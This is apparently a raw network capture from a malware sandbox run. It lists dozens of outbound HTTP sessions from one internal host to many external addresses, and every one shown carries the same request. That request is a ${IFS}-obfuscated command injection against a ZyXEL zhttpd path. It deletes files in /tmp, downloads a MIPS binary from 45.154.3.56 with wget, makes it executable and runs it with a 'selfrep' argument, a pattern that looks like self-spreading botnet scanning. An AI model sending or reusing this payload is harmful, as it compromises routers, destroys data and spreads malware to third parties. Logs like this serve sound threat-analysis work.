                        Mar 12, 2024 08:50:37.186122894 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2757192.168.2.1447236202.83.242.149443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:37.186152935 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2758192.168.2.1448426175.230.28.131443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:37.186220884 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2759192.168.2.1458836161.193.248.47443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:37.186247110 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2760192.168.2.145436486.226.119.101443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:37.186291933 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2761192.168.2.1454754200.75.110.65443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:37.186327934 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2762192.168.2.1453638139.110.5.156443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:37.186378956 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2763192.168.2.1441080192.200.245.104443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:37.186419010 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2764192.168.2.1448602103.8.213.154443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:38.194233894 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2765192.168.2.1445360148.173.65.96443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:38.194298983 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2766192.168.2.143741224.124.135.3443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:38.194355965 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2767192.168.2.1439484153.177.220.240443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:38.194396019 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2768192.168.2.1456010207.27.66.77443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:38.194456100 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2769192.168.2.145154447.43.108.231443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:38.194504976 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2770192.168.2.1452028208.46.90.46443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:38.194550037 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2771192.168.2.145424647.186.71.102443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:38.194588900 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2772192.168.2.1436728104.150.76.214443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:38.194608927 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2773192.168.2.145077075.170.25.131443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:38.194667101 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2774192.168.2.145967085.237.62.79443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:38.194704056 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2775192.168.2.1448900197.205.66.234443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:38.194766045 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2776192.168.2.1449700143.31.100.219443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:38.194796085 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2777192.168.2.145253247.94.193.209443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:38.194842100 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2778192.168.2.1438452221.232.80.205443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:38.194902897 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2779192.168.2.1434528192.4.206.178443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:38.194946051 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2780192.168.2.1453728161.1.176.225443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:38.194982052 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2781192.168.2.143387870.9.254.153443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:38.195017099 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2782192.168.2.143384047.145.240.53443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:38.195064068 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2783192.168.2.143777832.56.3.244443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:38.195090055 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2784192.168.2.1451276188.168.92.20443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:38.195152044 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2785192.168.2.143836270.225.72.90443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:38.195214987 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2786192.168.2.1438450206.141.63.65443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:38.195262909 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2787192.168.2.1456734218.246.100.135443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:38.195306063 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2788192.168.2.14441421.162.83.5443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:39.203746080 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2789192.168.2.1434772169.203.125.250443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:39.203784943 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2790192.168.2.1450280219.169.8.69443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:39.203828096 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2791192.168.2.1455270180.22.120.156443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:39.203881025 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2792192.168.2.1455220109.117.233.229443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:39.203916073 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2793192.168.2.145911296.158.103.250443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:39.203958035 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2794192.168.2.1450576128.93.116.44443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:39.203973055 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2795192.168.2.1459870180.14.3.173443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:39.204016924 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2796192.168.2.1442748159.136.194.84443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:39.204092026 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2797192.168.2.1450924158.64.194.209443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:39.204129934 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2798192.168.2.1449566110.61.147.137443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:39.204165936 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2799192.168.2.1432970199.43.248.157443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:39.204222918 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2800192.168.2.1437578111.115.15.138443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:39.204241037 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2801192.168.2.1435926157.58.116.160443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:39.204288006 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2802192.168.2.145724657.140.66.131443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:39.204309940 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2803192.168.2.1434214119.163.7.84443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:39.204358101 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2804192.168.2.1447382107.123.132.121443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:39.204407930 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2805192.168.2.1458280154.76.196.182443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:39.204452038 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2806192.168.2.143711892.183.69.57443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:39.204482079 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2807192.168.2.1456976176.10.215.186443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:39.204521894 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2808192.168.2.145296013.77.145.172443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:39.204590082 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2809192.168.2.144793850.253.88.142443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:39.204622030 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2810192.168.2.1434110171.6.253.249443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:39.204651117 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2811192.168.2.1433176219.110.66.243443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:39.204708099 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2812192.168.2.14409105.246.206.128443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:39.204724073 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2813192.168.2.1446304102.64.113.26443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:39.204778910 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2814192.168.2.1460874136.253.204.204443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:39.204828024 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2815192.168.2.14420829.224.202.223443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:39.204876900 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2816192.168.2.1452760152.96.197.248443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:39.204900980 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2817192.168.2.1453912201.28.94.17443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:39.204962969 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2818192.168.2.144093238.74.51.198443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:39.204991102 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2819192.168.2.1459332123.77.107.230443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:39.205013037 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2820192.168.2.143620057.198.238.253443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:39.205061913 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2821192.168.2.145438493.24.129.162443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:39.205096006 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2822192.168.2.1451424173.205.224.89443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:39.205137968 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2823192.168.2.145554476.157.17.74443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:39.205205917 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2824192.168.2.14378464.115.15.116443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:39.205239058 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2825192.168.2.1450986171.2.236.110443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:39.205276966 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
